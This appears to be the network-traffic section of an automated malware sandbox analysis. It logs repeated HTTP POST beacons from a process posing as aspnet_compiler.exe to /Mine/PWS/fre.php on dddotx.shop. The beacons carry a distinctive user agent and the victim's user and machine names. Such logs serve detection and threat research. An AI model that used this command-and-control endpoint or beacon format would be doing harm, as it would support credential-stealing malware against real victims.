              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHAGU87e5ScF5VKOzXAOGbSh%2Fv0%2BC3b88kNJGrDL%2B%2FYP%2BCefGKZC6HQrhY%2BMBAVaCJCmPPvQOXZ18gp6aZWKFXwd1GwCby9clYUWmbSHi5hAkYZOsVRLmljJXBX1bA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899698de2b5e6d-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.749708188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:16.372112989 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:16.376988888 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:17.021929979 CEST561INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:16 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8QNSisiSVEqhsk6TCyoGssnRvviWJUo9jzDFmiQm4VI28HHBgYV0vYYMShDkhYNJJVb6E8f6yZOg2qgKRjkF17BC5dCBiIQ36FRa2FZRqcgpVmssGNk2A9KKQ1CXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89969dd9e4431a-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.749709188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:17.173356056 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:17.178646088 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:18.146569014 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:17 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996a2deb043dd-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.
              Sep 25, 2024 10:19:18.146904945 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:17 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BOSV1q19agfRAcyOSr3G8U%2BwoyB8cgCXCChrISMMVo845%2Bag6s6tNHAVP8k6Gph9wJf1Ppc8pabXj2SFCiU9xvpcUzlsPNNIqAmtaFjUlml08%2FR%2BZttYl%2BNhDascQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996a2deb043dd-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.749710188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:18.291294098 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:18.296156883 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:18.987284899 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:18 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03BLncS52vpJEz1WmD%2BLPQ9t97y29aDADLRNppBZesIOedKbpGF3mpYFoickwpiFSIGSpiVgIKiYvX5FpkwIpoiyclDx5RgO0VKa2UncvkFbJ1ECLtf1AES7wT0qiw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996a9eeba4319-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.749711188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:19.149311066 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:19.154273987 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:19.794781923 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:19 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iuyt4sVbpw5v7D8MRS4CpKTyIh9kMv8R8bEhoqf9Sc7SaHYxg1XWLFkdDk7HxcvGV%2BtLLZQTgr2RbCLHi3QlChNz0IQEAP91q0VwW0fht4kRnYyFfvMEhiKchpY1pw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996af2d5c7292-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.749712188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:20.131067038 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:20.137434959 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:20.898915052 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:20 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=przmNtHt17QidHH1WoXo5RRVUv7HWNlmaIYCtvS%2BbUHR8XjEGwfebNnwepPJjMoPToSTfe7PbIPPharL1ajJnVZ2glsmcXP%2BHN1c3YTGb83cUhdGnXFrrt9wF5tNMw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996b528d58cdc-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.749713188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:21.048491955 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:21.053477049 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:21.689222097 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:21 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QgCVXj7RNA514KYbr%2BwUa%2BoK0SASz7gyoS3HxtTGjWWUrzgSq5IhiXSYvFZQZqA4Bhuhxo7WhImHscO4kj2WQ3jOvG0FSvEV%2BK5eh2X0rapu%2FzsBpyN7w8nm%2F%2FsMA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996bb0c387d06-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.749714188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:21.837608099 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:21.842648029 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:22.552182913 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:22 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AAybTIgOuUxx7QPzV%2B87h6QxSjxBTdSBgErwND8sNgMOvLLNA4ZTjKWQy1MVfWsy9SM95W6FgE9w%2FMdUuhGznlpnmHFazXQ661H1SLTOjTY5EaCl2vHPsMjajw%2FmA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996c00f91c334-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.749715188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:22.850320101 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:22.855191946 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:23.518683910 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:23 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maqvNCmgSwqA2O7i62KLiBuc7DqBxStg5Y%2Ffan4JJxh9IsWq%2Fm%2B6kDO3bvlCjthk60vmL31PeK%2FeZQBpO9GHbGg42%2BWoRcNv1W4Zvh6fTAjL%2Fcuo8LwKeBgvcmj6rA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996c6591a8c5f-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.749718188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:23.672030926 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:23.676953077 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:24.365703106 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:24 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1JoKrr7RhHAcpEe2cIYu5MWlyXZ6HS1JJtDy5m%2Fsrf%2B2aA1k0%2Bo0XoarJsZAKkRge0XXh62ZwPrbp1qINoihMUOlaNg4LF6PsYEaJe7cDIRipgD11gcv%2BHLmiG0jg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996cb6f104401-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.749720188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:24.565601110 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:24.570672035 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:25.286429882 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:25 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZ2uo4MS5haEFosad9DwHaAfIJP%2B9jPM1Cj4YkThGFemLImngDuXKlgfVe4vRiD5kTvw1PAOt6JHEDvWsvKDwqAqI35yC%2FembVxVhudmg1e6euqs0XPk13ES4XugDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996d10e290ca2-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.749723188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:25.434835911 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:25.439699888 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:25.750916958 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:27.092124939 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:27 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Xkta2U3QnLTgQhBitM61NxDRFKQNUwbsyMpWsX7tdzdkGpuo8YbGk2KkWGJtMBUPUrB1FjXVKY7DE%2BuMG8wnQhhvwpVVW0wbT3XTOWQBO4xVOo4uOImjw6jhR%2BruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996d67c038c60-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.749724188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:27.264889956 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:27.269752026 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:28.045062065 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:27 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRkENZEDwOcPzD62L4S7Gg4KDUpucGpdy4xNGyJoqEPX%2FOdANorPqjHQv5z4JgNB0Nzz7s3Pmey1HJ8oWwLrJuk7gdwZmFVKcxnlYJCpI5CkSAU9ksvvGv2hlyozXA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996e1d83b424a-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.749725188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:28.201822996 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:28.206792116 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:28.881432056 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:28 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvbXnmF9JsaSZMr0T%2B8mojQtqU91k2MfExJUFwLNUqGGeMJBYJemVH0qK6bjvGtA6kfOp3kfE%2B7Ykwn6uz5lRISD5aHZkf5bK9DGrOdBqDTzSyUw5nTBWn%2B2KRCsTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996e7ba494349-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.749726188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:29.032421112 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:29.037708998 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:29.680705070 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:29 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph4jvZ6wd3aVkAH%2BqVmYUVFZZxodfJmAaTv72TJBljn8HDSRVgnNsuQObOsBys7CzVCAc4cjnoVTUISIatbNYSouD%2F0MLK4NMGWcRKdvFBNSHDbg65y7auLOSKiLUA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8996ecfe6b1871-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


